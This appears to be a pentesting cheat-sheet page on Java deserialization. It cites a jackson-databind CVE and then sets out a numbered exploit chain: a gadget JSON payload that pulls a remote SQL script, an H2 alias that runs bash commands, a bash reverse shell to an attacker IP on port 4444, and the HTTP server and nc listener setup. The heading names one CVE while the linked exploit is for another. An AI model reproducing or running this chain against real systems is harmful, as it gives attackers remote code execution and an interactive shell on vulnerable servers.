# Serialization

## **Linux**

[**CVE-2020-9547**](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)**:** FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHG4-Ird5aaezqZFip%2F-MXHGqua1tknuebaSN-5%2FCVE-2019-12384.jpg?alt=media\&token=dc5ab088-f5a5-4272-80ae-e34dbf97d739)

{% embed url="<https://github.com/jas502n/CVE-2019-12384>" %}

```
1. Payload:
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPTFROM'http://10.10.xx.xx:443/sql.sql'"}]

2. Create file sql.sql with the target command
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i &>/dev/tcp/10.10.xxx.xxx/4444 0>&1 &')

3. python -m SimpleHTTPServer 443

4. nc -lvp 4444
```

Reference: <https://www.sangfor.com/en/info-center/blog-center/cyber-security/FasterXML-Jackson-databind-Remote-Code-Execution-CVE-2020-9547>